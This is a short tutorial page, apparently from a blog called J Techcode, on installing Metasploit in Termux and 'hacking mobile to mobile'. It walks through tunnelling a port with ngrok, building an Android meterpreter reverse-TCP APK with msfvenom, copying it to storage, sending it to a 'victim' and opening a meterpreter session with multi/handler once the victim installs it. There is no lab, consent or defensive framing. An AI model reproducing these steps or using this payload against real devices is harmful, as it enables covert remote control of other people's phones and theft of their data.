Install Metasploit in Termux And Hacking mobile to mobile - J Techcode

Part -1 video in Youtube

Install Metasploit in Termux

  1. pkg update
  2. pkg install repo
  3. pkg install unstable-repo
  4. pkg install metasploit
  5. wait for 10-15 mints metasploit successfully installed.
  6. now open metasploit-framework
  7. msfconsole

Same steps in all platforms - Termux, Windows10, Kali linux

Run your Ngrok 

For Kali Linux [ ./ngrok tcp 4444 ]
For Termux [ ./ngrok tcp 4444 ]
For Windows [ ngrok tcp 4444 ]

after then open new session in termux use multi terminal sessions

 Now create payload 

Command : msfvenom -p android/meterpreter/reverse_tcp LHOST= ngrokip LPORT= ngrokport R>appname.apk

  • Run this command and wait for 2 mints.
  • Now payload was created
  • Ls command run in same dir check your Apk file
  • App saved in $HOME/ 
  • Copy the App to your storage.
  • cp appname.apk /storage/emulated/0/DCIM/  (for internal storage)
  • cp appname.apk /sdcard/ (for sdcard)
  • Now send the Apk file to victim

Now Open Metasploit Framework

  • open new session in termux 
  • msfconsole (if not work give this command msfconsole.bat )
  • Now Metasploit framework opened
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp 
  • set LHOST localhost
  • set LPORT 4444
  • exploit
  • Now started reverse tcp handler : 4444
    Now server waiting for victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )

    Now Meterpreter Commands

    • Type 'help' to know all commands.